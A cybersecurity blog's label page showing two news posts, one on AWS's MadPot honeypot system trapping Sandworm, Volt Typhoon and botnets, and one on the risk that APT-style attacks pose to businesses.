Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label APTs. Show all posts
Volt Typhoon
APTs AWS Cyber Security DDoS botnets honeypot system MadPot Sandworm Security Vulnerabilities Threat Intelligence Volt Typhoon

AWS Employs MadPot Decoy System to Thwart APTs and Botnets

 

Amazon Web Services (AWS), a prominent player in cloud computing, has unveiled its internal defense system, MadPot, which has proven effective in luring and trapping malicious activities, including those orchestrated by nation-state-backed Advanced Persistent Threats (APTs) such as Volt Typhoon and Sandworm.

Conceived by AWS software engineer Nima Sharifi Mehr, MadPot is described as an advanced network of monitoring sensors equipped with automated response capabilities. This system ensnares malicious actors, monitors their actions, and generates protective data for various AWS security products.

MadPot is ingeniously designed to mimic numerous plausible targets, thwarting Distributed Denial of Service (DDoS) botnets, and preemptively blocking formidable threat actors like Sandworm from compromising AWS customers.

According to AWS, the sensors are vigilant over a staggering 100 million potential threat interactions and probes daily worldwide. Out of these, about 500,000 are identified as malicious activities, and this colossal trove of threat intelligence is meticulously analyzed to provide actionable insights on potentially harmful online activities. 

The response capabilities automatically shield the AWS network from identified threats, and they also reach out to other companies whose infrastructure is being exploited for malicious purposes.

In the case of Sandworm, the honeypot effectively intercepted the actor's attempt to exploit a security vulnerability in WatchGuard network security appliances. AWS not only identified IP addresses but also other distinct attributes linked to the Sandworm threat involved in the attempted breach of an AWS customer.

MadPot's remarkable capability to simulate a range of services and engage in extensive interactions enabled AWS to gather additional insights about Sandworm campaigns. This included specific services targeted by the actor and post-exploitation commands initiated by them. Armed with this intelligence, AWS promptly informed the affected customer, who took swift action to rectify the vulnerability.

Furthermore, AWS highlighted that the data and insights gathered by MadPot are harnessed to enhance the efficacy of their security tools, including AWS WAF, AWS Shield, AWS Network Firewall, and Amazon Route 53 Resolver DNS Firewall. These are complemented by detective and reactive services like Amazon GuardDuty, AWS Security Hub, and Amazon Inspector.
Read more »
State Sponsored Hackers
APTs Cyber Attacks State Sponsored Hackers

Is Your Business At Risk From APT Threats?

 

In 2022, organizations are re-analyzing their cybersecurity measures to mitigate risks and protect against potential cyber-attacks. After budgeting, risk assessment, compliance, and more, agencies have different priorities for their safety needs. As an organization, your business should consider two things, nation-state and Advanced Persistent Threat (APT) style attacks, along with growing ransomware threats, zero-day vulnerabilities, and phishing attacks. 

How APTs select targets? 

Your company might not have suffered a cyberattack in the past year, but there are chances that your partner or vendor in the supply chain has. APTs are normally used to send attacks with national-level impacts, for instance, intellectual property theft, espionage for national intelligence, or infrastructure compromise. In the end, the threat actor's end goal affects organizations and persons of prominence. In recent times, state-sponsored attacks focused on getting intelligence. These attacks might be industry-focused, but most of them target critical infrastructure. The majority of these attacks are directed by government organizations, hackers compromise or deliver security vulnerabilities to extract out critical intelligence. 

Should your business be concerned? 
Hacking campaigns that required months of planning and computing skills to bypass security walls and penetrate networks with ease could once only be done by state-sponsored hackers. In the present scenario, these methods are available to anyone, the resources are sold on the dark web as hired services or pre-packaged malware. The style of these APT attacks has not changed, today, anyone has access to the tools required to launch such powerful attacks. 

Due to remote work culture, every organization is moving its important data over the cloud, this opens up opportunities for threat actors to target these organizations. According to HelpNet Security, "the most important way to protect against APTs is to be proactive. Assume compromise, understand what compromise may look like for your organization, and go look for it. Simultaneously, try to not over-rely on technology. This approach has backfired on a variety of occasions over the last few years."
Read more »
Subscribe to: Posts (Atom)